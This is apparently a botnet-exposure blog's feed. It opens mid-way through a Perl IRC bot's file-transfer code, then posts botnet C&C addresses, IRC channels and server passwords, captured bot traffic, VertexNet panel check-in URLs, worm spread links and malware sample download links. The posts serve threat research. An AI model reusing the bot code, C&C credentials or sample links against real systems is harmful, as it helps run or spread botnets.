/&gt;     my $bytes = $DCC{$fh}{bytes};&lt;br /&gt;     my $cur_byte = $DCC{$fh}{curbyte};&lt;br /&gt;     my $nick = $DCC{$fh}{nick};&lt;br /&gt;&lt;br /&gt;     my $msg;&lt;br /&gt;     my $nread = sysread($fh, $msg, 10240);&lt;br /&gt;&lt;br /&gt;     if ($nread == 0 and $dcctipo =~ /^(get&amp;#124;sendcon)$/) {&lt;br /&gt;        $DCC{$fh}{status} = &amp;quot;Cancelado&amp;quot;;&lt;br /&gt;        $DCC{$fh}{ftime} = time;&lt;br /&gt;        $dcc_sel-&amp;gt;remove($fh);&lt;br /&gt;        $fh-&amp;gt;close;&lt;br /&gt;        next;&lt;br /&gt;     }&lt;br /&gt;&lt;br /&gt;     if ($dcctipo eq &amp;quot;get&amp;quot;) {&lt;br /&gt;        $DCC{$fh}{curbyte} += length($msg);&lt;br /&gt;&lt;br /&gt;        my $cur_byte = $DCC{$fh}{curbyte};&lt;br /&gt;&lt;br /&gt;        open(FILE, &amp;quot;&amp;gt;&amp;gt; $arquivo&amp;quot;);&lt;br /&gt;        print FILE &amp;quot;$msg&amp;quot; if ($cur_byte &amp;lt;= $bytes);&lt;br /&gt;        close(FILE);&lt;br /&gt;&lt;br /&gt;        my $packbyte = pack(&amp;quot;N&amp;quot;, $cur_byte);&lt;br /&gt;        print $fh &amp;quot;$packbyte&amp;quot;;&lt;br /&gt;&lt;br /&gt;        if ($bytes == $cur_byte) {&lt;br /&gt;           $dcc_sel-&amp;gt;remove($fh);&lt;br /&gt;           $fh-&amp;gt;close;&lt;br /&gt;           $DCC{$fh}{status} = &amp;quot;Recebido&amp;quot;;&lt;br /&gt;           $DCC{$fh}{ftime} = time;&lt;br /&gt;           next;&lt;br /&gt;        }&lt;br /&gt;     } elsif ($dcctipo eq &amp;quot;send&amp;quot;) {&lt;br /&gt;          my $send = $fh-&amp;gt;accept;&lt;br /&gt;          $send-&amp;gt;autoflush(1);&lt;br /&gt;          $dcc_sel-&amp;gt;add($send);&lt;br /&gt;          $dcc_sel-&amp;gt;remove($fh);&lt;br /&gt;          $DCC{$send}{tipo} = 'sendcon';&lt;br /&gt;          $DCC{$send}{itime} = time;&lt;br /&gt;          $DCC{$send}{nick} = $nick;&lt;br /&gt;          $DCC{$send}{bytes} = $bytes;&lt;br /&gt;          $DCC{$send}{curbyte} = 0;&lt;br /&gt;          $DCC{$send}{arquivo} = $arquivo;&lt;br /&gt;          $DCC{$send}{ip} = $send-&amp;gt;peerhost;&lt;br /&gt;          $DCC{$send}{porta} = $send-&amp;gt;peerport;&lt;br /&gt;          $DCC{$send}{status} = &amp;quot;Enviando&amp;quot;;&lt;br /&gt;&lt;br /&gt;          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon&lt;br /&gt;          open(FILE, &amp;quot;&amp;lt; $arquivo&amp;quot;);&lt;br /&gt;          my $fbytes;&lt;br /&gt;          read(FILE, $fbytes, 1024);&lt;br /&gt;          print $send &amp;quot;$fbytes&amp;quot;;&lt;br /&gt;          close FILE;&lt;br /&gt;#          delete($DCC{$fh});&lt;br /&gt;     } elsif ($dcctipo eq 'sendcon') {&lt;br /&gt;          my $bytes_sended = unpack(&amp;quot;N&amp;quot;, $msg);&lt;br /&gt;          $DCC{$fh}{curbyte} = $bytes_sended;&lt;br /&gt;          if ($bytes_sended == $bytes) {&lt;br /&gt;             $fh-&amp;gt;close;&lt;br /&gt;             $dcc_sel-&amp;gt;remove($fh);&lt;br /&gt;             $DCC{$fh}{status} = &amp;quot;Enviado&amp;quot;;&lt;br /&gt;             $DCC{$fh}{ftime} = time;&lt;br /&gt;             next;&lt;br /&gt;          }&lt;br /&gt;          open(SENDFILE, &amp;quot;&amp;lt; $arquivo&amp;quot;);&lt;br /&gt;          seek(SENDFILE, $bytes_sended, 0);&lt;br /&gt;          my $send_bytes;&lt;br /&gt;          read(SENDFILE, $send_bytes, 1024);&lt;br /&gt;          print $fh &amp;quot;$send_bytes&amp;quot;;&lt;br /&gt;          close(SENDFILE);&lt;br /&gt;     }&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sub SEND {&lt;br /&gt;  my ($nick, $arquivo) = @_;&lt;br /&gt;  unless (-r &amp;quot;$arquivo&amp;quot;) {&lt;br /&gt;    return(0);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  my $dccark = $arquivo;&lt;br /&gt;  $dccark =~ s/[.*\/](\S+)/$1/;&lt;br /&gt;&lt;br /&gt;  my $meuip = $::irc_servers{&amp;quot;$::IRC_cur_socket&amp;quot;}{'meuip'};&lt;br /&gt;  my $longip = unpack(&amp;quot;N&amp;quot;,inet_aton($meuip));&lt;br /&gt;&lt;br /&gt;  my @filestat = stat($arquivo);&lt;br /&gt;  my $size_total=$filestat[7];&lt;br /&gt;  if ($size_total == 0) {&lt;br /&gt;     return(0);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  my ($porta, $sendsock);&lt;br /&gt;  do {&lt;br /&gt;    $porta = int rand(64511);&lt;br /&gt;    $porta += 1024;&lt;br /&gt;    $sendsock = IO::Socket::INET-&amp;gt;new(Listen=&amp;gt;1, LocalPort =&amp;gt;$porta, Proto =&amp;gt; 'tcp') and $dcc_sel-&amp;gt;add($sendsock);&lt;br /&gt;  } until $sendsock;&lt;br /&gt;&lt;br /&gt;  $DCC{$sendsock}{tipo} = 'send';&lt;br /&gt;  $DCC{$sendsock}{nick} = $nick;&lt;br /&gt;  $DCC{$sendsock}{bytes} = $size_total;&lt;br /&gt;  $DCC{$sendsock}{arquivo} = $arquivo;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &amp;amp;::ctcp(&amp;quot;$nick&amp;quot;, &amp;quot;DCC SEND $dccark $longip $porta $size_total&amp;quot;);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub GET {&lt;br /&gt;  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;&lt;br /&gt;  return(0) if (-e &amp;quot;$arquivo&amp;quot;);&lt;br /&gt;  if (open(FILE, &amp;quot;&amp;gt; $arquivo&amp;quot;)) {&lt;br /&gt;     close FILE;&lt;br /&gt;  } else {&lt;br /&gt;    return(0);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  my $dccip=fixaddr($dcclongip);&lt;br /&gt;  return(0) if ($dccporta &amp;lt; 1024 or not defined $dccip or $bytes &amp;lt; 1);&lt;br /&gt;  my $dccsock = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;&amp;quot;tcp&amp;quot;, PeerAddr=&amp;gt;$dccip, PeerPort=&amp;gt;$dccporta, Timeout=&amp;gt;15) or return (0);&lt;br /&gt;  $dccsock-&amp;gt;autoflush(1);&lt;br /&gt;  $dcc_sel-&amp;gt;add($dccsock);&lt;br /&gt;  $DCC{$dccsock}{tipo} = 'get';&lt;br /&gt;  $DCC{$dccsock}{itime} = time;&lt;br /&gt;  $DCC{$dccsock}{nick} = $nick;&lt;br /&gt;  $DCC{$dccsock}{bytes} = $bytes;&lt;br /&gt;  $DCC{$dccsock}{curbyte} = 0;&lt;br /&gt;  $DCC{$dccsock}{arquivo} = $arquivo;&lt;br /&gt;  $DCC{$dccsock}{ip} = $dccip;&lt;br /&gt;  $DCC{$dccsock}{porta} = $dccporta;&lt;br /&gt;  $DCC{$dccsock}{status} = &amp;quot;Recebendo&amp;quot;;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;Now talking in #&lt;br /&gt;Topic On: [ # ] [ !all !pacotes on ]&lt;br /&gt;Topic By: [ kuba ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://77.88.148.25/~kriters/al&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8145212110713785976?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8145212110713785976/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/91220127238linux-bots-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8145212110713785976'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8145212110713785976'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/91220127238linux-bots-hosted-in-united.html' title='91.220.127.238(Linux Bots hosted in United Kingdom Vooservers Limited)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5410180356220542517</id><published>2012-01-01T00:24:00.001+01:00</published><updated>2012-01-01T00:29:01.141+01:00</updated><title type='text'>Happy new year  2012 to everyone(gezuar vitin e ri te gjithe atyre qe shkruajne e flasin shqip)</title><content type='html'>Hello everyone&lt;br /&gt;i wish u all the best and happy new year 2012&lt;br /&gt;&lt;br /&gt;Gezuar vitin e ri 2012 te gjithe atyre qe kane lindur shqiptare e qe shkruajne e flasin gjuhen me te bukur ne bote SHQIPEN&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5410180356220542517?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5410180356220542517/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/happy-new-year-to-everyonegezuar-vitin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5410180356220542517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5410180356220542517'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/happy-new-year-to-everyonegezuar-vitin.html' title='Happy new year  2012 to everyone(gezuar vitin e ri te gjithe atyre qe shkruajne e flasin shqip)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8078147821695379034</id><published>2011-12-31T18:19:00.000+01:00</published><updated>2011-12-31T18:19:00.414+01:00</updated><title type='text'>uniquefraud.org(underground criminal lamers hosted in 2x4.ru)</title><content type='html'>today i found this email in my spams&lt;br /&gt;de admin@uniquefraud.org via sec5127.2x4.ru &lt;br /&gt;à my email&lt;br /&gt;date 30 décembre 2011 22:52&lt;br /&gt;objet News UniqueFraud&lt;br /&gt;envoyé par sec5127.2x4.ru&lt;br /&gt;&lt;br /&gt;masquer les détails 22:52 (Il y a 19 heures)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Letze Chance 2011&lt;br /&gt;&lt;br /&gt;Wer möchte Sie nutzen?&lt;br /&gt;&lt;br /&gt;Komme vorbei und mach dir einen Account&lt;br /&gt;&lt;br /&gt;Wir freuen uns&lt;br /&gt;&lt;br /&gt;Die Registrierung ist nur noch ein paar Tage auf&lt;br /&gt;&lt;br /&gt;http://uniquefraud.org&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sorry für den Spam&lt;br /&gt;&lt;br /&gt;UF-Team&lt;br /&gt;&lt;br /&gt;funny thing is theyre using cloudflare to mask their servers...&lt;br /&gt;now what i can think cloudflare is into fraud or cloudflare staf dont give a shit about who they host ? lol&lt;br /&gt;&lt;br /&gt;Resolved : [uniquefraud.org] To [173.245.61.111]&lt;br /&gt;Resolved : [uniquefraud.org] To [173.245.61.39]&lt;br /&gt;http://whois.domaintools.com/173.245.61.111&lt;br /&gt;&lt;br /&gt;back to frauders &lt;br /&gt;looks like theyre deutch and very bad lamers&lt;br /&gt;they have a board and blog allready&lt;br /&gt;&lt;br /&gt;here some pictures:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-BOoQU0IZwqA/Tv9DQkyymCI/AAAAAAAAAKU/WD3jm0ydph4/s1600/uniquefraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="199" src="http://4.bp.blogspot.com/-BOoQU0IZwqA/Tv9DQkyymCI/AAAAAAAAAKU/WD3jm0ydph4/s320/uniquefraud.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ISRjXOoEr70/Tv9D-bNRJYI/AAAAAAAAAKg/fKA3020VaEI/s1600/uniquefrauders.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="197" src="http://2.bp.blogspot.com/-ISRjXOoEr70/Tv9D-bNRJYI/AAAAAAAAAKg/fKA3020VaEI/s320/uniquefrauders.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8078147821695379034?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8078147821695379034/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/uniquefraudorgunderground-criminal.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8078147821695379034'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8078147821695379034'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/uniquefraudorgunderground-criminal.html' title='uniquefraud.org(underground criminal lamers hosted in 2x4.ru)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-BOoQU0IZwqA/Tv9DQkyymCI/AAAAAAAAAKU/WD3jm0ydph4/s72-c/uniquefraud.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2925737033806364232</id><published>2011-12-28T19:24:00.000+01:00</published><updated>2011-12-28T19:24:13.297+01:00</updated><title type='text'>64mb malware samples</title><content type='html'>This is another package with malware samples collected during my free time&lt;br /&gt;Inside u have alot of banking trojan samples,ngrBot samples,mirc bots samples etc&lt;br /&gt;have fun exploring &lt;br /&gt;&lt;br /&gt;&lt;a href="http://5fd0f208.theseblogs.com"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2925737033806364232?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2925737033806364232/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/64mb-malware-samples.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2925737033806364232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2925737033806364232'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/64mb-malware-samples.html' title='64mb malware samples'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8530977266261059484</id><published>2011-12-25T19:05:00.000+01:00</published><updated>2011-12-25T19:05:11.432+01:00</updated><title type='text'>208.67.252.2(irc botnet hosted in United States Denver Rocketeermedia.com)</title><content type='html'>Remote Host Port Number&lt;br /&gt;208.67.252.2 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|29713]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-2551 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|29713] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/208.67.252.2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8530977266261059484?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8530977266261059484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/208672522irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8530977266261059484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8530977266261059484'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/208672522irc-botnet-hosted-in-united.html' title='208.67.252.2(irc botnet hosted in United States Denver Rocketeermedia.com)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4983991276444119131</id><published>2011-12-21T23:10:00.000+01:00</published><updated>2011-12-21T23:10:15.154+01:00</updated><title type='text'>irc.amet12.cjb.net(irc botnet hosted in Peru Lima Telefonica Del Peru S.a.a)</title><content type='html'>Resolved : [irc.amet12.cjb.net] To [200.48.201.149]&lt;br /&gt;&lt;br /&gt;200.48.201.149 4244 PASS \google_cache2.tmp&lt;br /&gt;&lt;br /&gt;NICK new[iRooT-XP-USA]861309&lt;br /&gt;USER 8613 "" "TsGh" :8613&lt;br /&gt;JOIN #!N!# WTF&lt;br /&gt;PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited!&lt;br /&gt;&lt;br /&gt;exe file:&lt;br /&gt;&lt;a href="http://279faa84.theseforums.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/200.48.201.149&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4983991276444119131?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4983991276444119131/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/ircamet12cjbnetirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4983991276444119131'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4983991276444119131'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/ircamet12cjbnetirc-botnet-hosted-in.html' title='irc.amet12.cjb.net(irc botnet hosted in Peru Lima Telefonica Del Peru S.a.a)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8727652748650338010</id><published>2011-12-21T19:18:00.000+01:00</published><updated>2011-12-21T19:18:16.293+01:00</updated><title type='text'>mw8.no-ip.info(irc botnet hosted in Netherlands Worldstream)</title><content type='html'>Resolved : [mw8.no-ip.info] To [217.23.4.65]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;217.23.4.65 6667 PASS \google_cache2.tmp&lt;br /&gt;&lt;br /&gt;NICK new[iRooT-XP-USA]392156&lt;br /&gt;USER 4337 "" "TsGh" :4337&lt;br /&gt;JOIN #Bawse&lt;br /&gt;PONG :irc.priv8net.com&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/217.23.4.65&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8727652748650338010?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8727652748650338010/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/mw8no-ipinfoirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8727652748650338010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8727652748650338010'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/mw8no-ipinfoirc-botnet-hosted-in.html' title='mw8.no-ip.info(irc botnet hosted in Netherlands Worldstream)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-966881455349899016</id><published>2011-12-21T01:24:00.000+01:00</published><updated>2011-12-21T01:24:00.234+01:00</updated><title type='text'>blackicejoker.no-ip.biz(VertexNet hosted in Seychelles Ideal Solution Ltd)</title><content type='html'>blackicejoker.no-ip.biz 193.107.17.47&lt;br /&gt;&lt;br /&gt;Download URLs&lt;br /&gt; http://193.107.17.47/VertexNet/tasks.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804} (blackicejoker.no-ip.biz) &lt;br /&gt; http://193.107.17.47/VertexNet/adduser.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804}&amp;lan=10.1.8.2&amp;cmpname=DELL-D3E62F7E26%20[Administrator]&amp;country=Deutsch%20(Deutschland)%20+49&amp;cc=DE&amp;idle=9376&amp;ver=v1.2 (blackicejoker.no-ip.biz)&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.17.47&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-966881455349899016?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/966881455349899016/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/blackicejokerno-ipbizvertexnet-hosted.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/966881455349899016'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/966881455349899016'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/blackicejokerno-ipbizvertexnet-hosted.html' title='blackicejoker.no-ip.biz(VertexNet hosted in Seychelles Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3451417898394647195</id><published>2011-12-20T18:44:00.000+01:00</published><updated>2011-12-20T18:44:14.111+01:00</updated><title type='text'>193.107.16.114(ngrBot hosted in Seychelles Ideal Solution Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;193.107.16.114 1863 PASS ngrBot&lt;br /&gt;199.15.234.7 80&lt;br /&gt;65.110.60.20 80&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}tuoheyk&lt;br /&gt;USER tuoheyk 0 0 :tuoheyk&lt;br /&gt;JOIN #rjr RjR&lt;br /&gt;PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) - Redirected 4 domain(s)&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.16.114&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3451417898394647195?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3451417898394647195/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/19310716114ngrbot-hosted-in-seychelles.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3451417898394647195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3451417898394647195'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/19310716114ngrbot-hosted-in-seychelles.html' title='193.107.16.114(ngrBot hosted in Seychelles Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5414986998801371427</id><published>2011-12-18T22:47:00.002+01:00</published><updated>2011-12-31T17:36:16.933+01:00</updated><title type='text'>jayian.com(irc botnet hosted in United States Kenmore Sentris Network Llc)</title><content type='html'>Resolved : [jayian.com] To [76.191.112.53]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;76.191.112.53 1866&lt;br /&gt;&lt;br /&gt;NICK n[USA|XP|COMPUTERNAME]qfilxzg&lt;br /&gt;USER hh "" "lol" :hh&lt;br /&gt;JOIN #!h!&lt;br /&gt;PONG 422&lt;br /&gt;&lt;br /&gt;Now talking in #!h!&lt;br /&gt;Topic On: [ #!h! ] [ ]&lt;br /&gt;Topic By: [ xx ]&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;69.163.148.162 80&lt;br /&gt;76.191.112.53 2087 PASS carmex&lt;br /&gt;&lt;br /&gt;PRIVMSG #!s! :[DNS]: Blocked 1325 domain(s) - Redirected 0 domain(s)&lt;br /&gt;NICK n{US|XPa}ydumpja&lt;br /&gt;USER ydumpja 0 0 :ydumpja&lt;br /&gt;JOIN #!s! carmex&lt;br /&gt;PRIVMSG #!s! :[MSN]: Updated MSN spread interval to "3"&lt;br /&gt;PRIVMSG #!s! :[MSN]: Updated MSN spread message to ":P LOL http://www.bompesqueiro.com/album.php?usr637-id3d7l1-Photo81.JPG"&lt;br /&gt;PRIVMSG #!s! :[HTTP]: Updated HTTP spread interval to "3"&lt;br /&gt;PRIVMSG #!s! :[HTTP]: Updated HTTP spread message to ":O LOL http://www.bompesqueiro.com/album.php?usr929-id3c1k5-Photo37.JPG"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/76.191.112.53&lt;div 